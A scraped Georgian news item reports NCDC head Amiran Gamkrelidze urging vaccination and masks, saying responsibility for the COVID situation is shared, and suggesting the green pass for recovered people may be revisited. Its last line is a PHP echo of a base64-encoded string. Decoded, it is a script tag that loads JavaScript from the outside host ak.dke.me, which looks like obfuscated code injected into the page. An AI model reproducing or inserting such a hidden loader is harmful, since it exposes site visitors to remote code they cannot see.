celsiusi
ავერსი შნაიდერი
თუ მეტყვით, რომ მე უნდა ვაგო პასუხი და გამყრელიძე თუ არ იქნება დღეს და ხვალ, საქართველოში კორონა გაქრება, ხვალვე წავალ NCDC-დან, მაგრამ ეს არ არის მთავარი, - აღნიშნულის შესახებ დაავადებათა კონტროლის ეროვნული ცენტრის ხელმძღვანელმა, ამირან გამყრელიძემ ბრიფინგზე განაცხადა.
 
მისი თქმით, არსებულ ეპიდვითარებაზე თითოეული ადამიანია პასუხისმგებელი.
 
„მთავარია, რომ ყველა პასუხისმგებელი ვართ. ის, ვინც მართავს და არის კიდევ მთელი საზოგადოება. საზოგადოებრივი კონსენსუსია საჭირო.
 
ყველაზე ძალიან შეიძლება ჩემზე მოქმედებს ის 50 და 60 გარდაცვალება ყოველ დილით, ერთ-ერთი პირველი მე ვიგებ ამ ინფორმაციას. რომ გეუბნებით, თითო ადამიანს გადაარჩენთ, თუ ყველა ავიცრებით, 500 ადამიანი ერთი სიცოცხლის სანაცვლოდ, გავაკეთოთ მთელმა საზოგადოებამ ეს. ხომ შეიძლება ერთ საკითხზე მაინც შევთანხმდეთ ქართველები. კოვიდი არის დღეს ყველაზე დიდი პრიმატი ქვეყანაში. უმაღლესი პრიმატი და ამ პრიმატის ირგვლივ ყველა გავერთიანდეთ და ვთქვათ, რომ ყველა ვიცრებით იმისთვის, რომ გადარჩეს ჩემი ოჯახის წევრი, ჩემი მეგობარი, ჩემი მეზობელი, ჩემი უახლოესი ადამიანი, ყველამ გავიკეთოთ პირბადე, ყველას მოვუწოდოთ ამისკენ“, - განაცხადა გამყრელიძემ.
 
მან კოვიდგადატანილი ადამიანებისთვის ე.წ. უვადო მწვანე პასპორტის შესახებაც ისაუბრა და განმარტა, რომ შესაძლოა, ეს საკითხი გადაიხედოს.
 
„ამ ქვეყანაზე მუდმივი არაფერი არის. ალბათ, ზოგიერთი საკითხი გარკვეული პერიოდულობით გადაიხედება. ამ ეტაპზე მოდით, ის მაინც აღვასრულოთ, რაც არის“, - განაცხადა გამყრელიძემ.
1003
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");